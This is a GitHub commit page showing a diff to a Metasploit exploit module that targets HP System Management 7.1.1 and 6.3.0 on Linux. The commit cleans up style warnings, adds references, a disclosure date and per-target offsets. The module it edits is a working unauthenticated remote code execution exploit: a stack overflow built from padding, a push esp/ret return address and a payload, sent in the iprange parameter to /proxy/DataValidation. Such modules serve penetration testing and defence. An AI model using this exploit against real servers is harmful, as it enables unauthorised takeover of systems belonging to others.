Skip to content

Commit 139926a

Browse files
author
agix
committed
Fix msftidy Warning
1 parent eec386d commit 139926a

File tree

1 file changed

+18
-15
lines changed

1 file changed

+18
-15
lines changed

modules/exploits/linux/http/hp_system_management.rb

Lines changed: 18 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
1414

1515
def initialize(info = {})
1616
super(update_info(info,
17-
'Name' => 'HP System Management anonymous access Code execution',
17+
'Name' => 'HP System Management Anonymous Access Code Execution',
1818
'Description' => %q{
1919
This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior.
2020
},
21-
'Author' => [ 'agix' ],
21+
'Author' => [ 'agix - @agixid' ],
2222
'License' => MSF_LICENSE,
2323
'Payload' =>
2424
{
@@ -28,40 +28,43 @@ def initialize(info = {})
2828
},
2929
'Platform' => ['linux'],
3030
'Arch' => ARCH_X86,
31+
'References' =>
32+
[
33+
['URL', 'http://bit.ly/YhjikT']
34+
]
3135
'Targets' => [
3236

33-
[ 'HP System Management 7.1.1',
37+
[ 'HP System Management 7.1.1 - Linux (CentOS)',
3438
{
3539
'Ret' => 0x8054e14, # push esp / ret
40+
'Offset' => 267
3641
}
3742
],
38-
[ 'HP System Management 6.3.0',
43+
[ 'HP System Management 6.3.0 - Linux (CentOS)',
3944
{
4045
'Ret' => 0x805a547, # push esp / ret
46+
'Offset' => 267
4147
}
4248
]
4349

4450
],
51+
'DisclosureDate' => 'Sep 01 2012',
4552
'DefaultTarget' => 0))
4653

47-
end
48-
4954
def exploit
50-
51-
padding = "z"*267
55+
padding = rand_text(target['Offset'])
5256
ret = [target['Ret']].pack('V')
53-
uri = "/proxy/DataValidation?iprange=a-bz"+padding+ret+payload.encoded
54-
puts uri.inspect()
57+
uri = "/proxy/DataValidation"
58+
iprange = "a-bz"+padding+ret+payload.encoded
5559
print_status("Sending #{uri.length} bytes payload...")
5660

57-
res = send_request_raw({
61+
res = send_request_cgi({
5862
'method' => 'GET',
5963
'uri' => uri,
60-
'version' => '1.1',
61-
'vhost' => rhost
64+
'vars_get' => {
65+
'iprange' => iprange
66+
}
6267
})
63-
64-
6568
handler
6669
end
6770

0 commit comments

Comments
 (0)